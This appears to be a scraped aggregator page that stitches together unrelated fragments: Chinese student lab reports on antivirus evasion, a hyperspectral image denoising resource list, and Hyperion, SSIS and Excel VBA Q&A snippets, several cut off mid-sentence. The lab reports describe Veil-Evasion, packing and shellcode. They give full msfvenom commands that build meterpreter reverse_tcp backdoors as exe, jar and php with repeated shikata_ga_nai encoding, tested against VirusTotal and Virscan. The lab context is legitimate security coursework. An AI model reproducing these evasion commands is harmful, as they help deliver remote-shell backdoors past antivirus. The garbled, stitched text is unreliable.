
2019-2020-2 网络对抗技术 20174326旦增列措 EXP3 免杀原理与实践

坚强是说给别人听的谎言 提交于 2020-08-17 02:47:45
2019-2020-2 网络对抗技术 20174326旦增列措 EXP3 免杀原理与实践 1.实验环境 PC机一台,安装有win10系统 ,作为靶机进行实测 安装的kali虚拟机,作为攻击机 kali虚拟机安装有veil-evasion win10系统有windows Defender作为杀软. 检测网站是VirusTotal 实验准备即相关知识 VirusTotal、Virscan 集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。 链接如下: VirusTotal Virscan Msfvenom使用编码器 Msfvenom是Metasploit平台下用来编码payloads免杀的工具。 模板是msfvenom用来生成最终Exe的那个壳子exe文件,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。 Veil-Evasion Veil-Evasion是一个免杀平台,与Metasploit有点类似,在Kalil软件库中有,但默认没装。 C语言调用Shellcode 就是一个半手工打造恶意软件的例子。 加壳 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

六眼飞鱼酱① 提交于 2020-05-06 03:08:21
2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践 一、实验内容 任务一正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,利用shellcode编程等免杀工具或技巧 1、使用msf编码器,生成exe文件 使用exp2中生产的后门程序 20165334_backdoor.exe 利用 VirusTotal 网站进行扫描检测。 20165334_backdoor.exe 利用 Virscan 网站进行扫描检测。 -使msf编码器对后门程序进行多次的编码,并检测。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST= LPORT=5334 -f exe > met-lt5334l.exe 用使用virscan进行扫描,结果如下所示 msfvenom生成jar文件 msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=5334 x> ltl_backdoor_java.jar 用使用virscan进行扫描,结果如下所示 msfvenom生成php文件 msfvenom -p php


China☆狼群 提交于 2020-04-24 23:46:30
  最近在跟同学一起做高光谱图像去噪相关的实验,同学找到了一个github上的资源清单,感觉非常有用,分享在这里: 点我看宝藏   感谢 Yongshen Zhao 和 Junjun Jiang 整理的这份资料~   下面我大致做一点翻译,让大家可以更方便地了解到这份资料的内容:      一、去噪方法   1、带式去噪方法(Band-wise denoising methods) [BM3D] 通过稀疏3-D变换域协同过滤进行图像去噪,TIP2007,K。Dabov等。 [WNNM] 应用于图像去噪的加权核范数最小化,CVPR2014,S。Gu等。 [EPLL] 从自然图像斑块的学习模型到整个图像恢复,ICCV2011,D。Zoran等。   2、基于多频段的方法   1)变换域方法 基于小波的高光谱图像估计,IGARSS2003,I。Atkinson等。 使用3D小波进行高光谱图像去噪,IGARSS2013,B。Rasti等。 用于体数据去噪和重建的非局部变换域滤波器,TIP2012,M。Maggioni等。 使用小波域中的一阶谱粗糙度惩罚的高光谱图像去噪,JStars2014,B.Rasti等。   2)空间域方法   通过采用合理的假设或先验,例如沿Spetrum的全局相关,跨空间的非局部自相似性(NSS),总变差(TV),非本地(Non-Local),稀疏表示(SR)

What are the options for extracting data out of Hyperion 7.3 with SSIS?

Deadly 提交于 2020-01-06 07:58:08
问题 We need to get data out of some Hyperion cubes (databases) using SSIS. Are there any connection managers available for this? Has anyone done this? 回答1: There are some third party connectors out there. Don't think any exist from oracle or microsoft. 回答2: I know this is a very old question but I just happened upon it and thought I would offer some perspective. There isn't build in support for getting data from Hyperion with SSIS. There are a few ways to go, however. You can fairly easily export

Enable COM addins in Excel through VBA

生来就可爱ヽ(ⅴ<●) 提交于 2019-12-20 03:23:13
问题 I need to enable COM addins through VBA. The addins already exists under COM addins, but become unchecked when Excel crashes. Sub hyp() Dim objAddIn As Object For i = 1 To Application.COMAddIns.Count Set objAddIn = Application.COMAddIns.Item(i) On Error Resume Next If Application.COMAddIns.Item(i).Description = "Oracle Smart View for Office" Then 'MsgBox Application.COMAddIns.Item(i).Description 'NEED TO ENABLE THE COM ADDIN Else End If Next i End Sub 回答1: Public Sub Connect_COM_AddIn(Name As

SQLServer Error: 18546 - SQLState 28000

孤人 提交于 2019-12-13 18:36:09
问题 I have a 3-level application running. WebServer IIS7.5 and SQLServer 2008 R2 Express Database and OS WinServer 2008 WebEdition. When I try to connect via ODBC from a PC on the network have this error. Remote connections with MSSM (Microsoft SqlServer Managemet Studio) work properly. I want to use this ODBC to connect Hyperion to SQLServer Can you help me? 回答1: I resolve to enable TCP/IP service in SQL Server Configuration Manager. After this , if problem persist disable firewall on private

How do you add a rule to cells in excel?

时光毁灭记忆、已成空白 提交于 2019-12-13 03:13:16
问题 I have a set of data extracted from Hyperion Essbase in which I would like to add a rule over those cells. I've tried conditional formatting, but I'm not getting what I want. For example some cells contain 0.000 or 13.5232 and the rule I want over them is IF(ROUND(ABS(Cell Value),2)<=0.01,0,Cell Value) I'm not sure if my formula is the one that doesn't make sense or I'm not using conditional formatting correctly. I don't need any cells highlighted, I would just like the data in the cells

Passing Parameters to a Batch File from Javascript Inside Hyperion Interactive Reporting Studio

北城以北 提交于 2019-12-12 02:39:06
问题 Inside of Hyperion Reporting Studio I have a document level script where I wish to call a batch file and pass arguments to the batch file. Here is the code I have: var Path = "W:\\directory\\Reference_Files\\scripts\\vbs\\SendEmail.bat" var Email = "my.email@xxx.com" var Subject = "My Subject" var Body = "My Body" var Attach = "W:\Maughan.xls" Application.Shell(Path + " " + Email + " " + Subject + " " + Body + " " + Attach) This code does not open the file, but gives the error message The

Javascript: Array name as string; Need it to reference the actual array [duplicate]

被刻印的时光 ゝ 提交于 2019-12-11 03:34:25
问题 This question already has an answer here : Create Javascript Variable with name of a variable and string combined (1 answer) Closed 6 years ago . I have to "get at" an array, but all I have is a string that matches the array name. Obviously this kind of thing won't work, but it shows what I'm trying to do: var arrayname = new Array(1, 2, 3); var array = 'arrayname'; Alert(array[0]); Of course, the example above yeilds 'a' instead of 1, like I'd need. The background is that I'm working with a